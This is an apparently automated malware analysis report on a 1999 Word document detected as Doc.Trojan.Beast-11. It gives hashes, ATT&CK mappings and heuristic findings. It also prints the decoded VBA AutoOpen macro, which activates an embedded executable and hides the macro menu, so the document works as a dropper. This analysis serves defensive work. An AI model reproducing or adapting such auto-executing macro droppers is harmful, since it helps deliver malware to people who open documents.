Office (OLE) malware analysis — malicious · 65535d849d3fdd0f

MALICIOUS

Office (OLE)

137.5 KB Created: 1999-05-24 15:23:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 53f1469fd93db2d1828808055950c517 SHA-1: 73f3c52688078eedd431b2fc616cae2c582b7141 SHA-256: 65535d849d3fdd0f280a33bbdde265097e4a78939e90c5fe183a091ee0eb3eeb

388 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an OLE document containing a VBA macro with an AutoOpen subroutine. This macro is designed to activate an embedded PE executable, identified as 'embedded_office_0001422a.exe'. The presence of the embedded executable and the WinExec API reference strongly indicate that the document is intended to deliver and execute a malicious payload. The document body discusses World War I, which appears to be a lure.

Heuristics 9

OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
ClamAV: Doc.Trojan.Beast-11 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Beast-11
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
Reference to WinExec API high SC_STR_WINEXEC

Reference to WinExec API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Customizable = True
Sub AutoOpen()
  If DateDiff("s", CDate(GetSetting("3BEPb", "Startup", "date", 0)), Time) > 300 Then

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	550 bytes
SHA-256: `78cdfd5c7b7d676d59dcfe5a4fd35335223508543fedf50abf0b9e35ddbb6e38`
Detection ClamAV: Doc.Trojan.Beast-11 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If DateDiff("s", CDate(GetSetting("3BEPb", "Startup", "date", 0)), Time) > 300 Then ActiveDocument.Shapes("3BEPb").Activate Selection.HomeKey Unit:=wdStory CommandBars("Tools").Controls("Macro").Visible = False Options.SaveNormalPrompt = False End If End Sub
`embedded_office_0001422a.exe`	embedded-pe	Office MZ+PE at offset 0x1422A	58326 bytes
SHA-256: `630c4834055fa144756374813e4075f125f30e4f7b2db089f6d8bc17795558cb`
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_989134934/Ole10Native	41644 bytes
SHA-256: `deb4beb8cae41618185b8564aa3c8ab8c00c14e054c4edc30fe15221efca1168`

Open this report in the interactive analyzer, or submit your own file for analysis.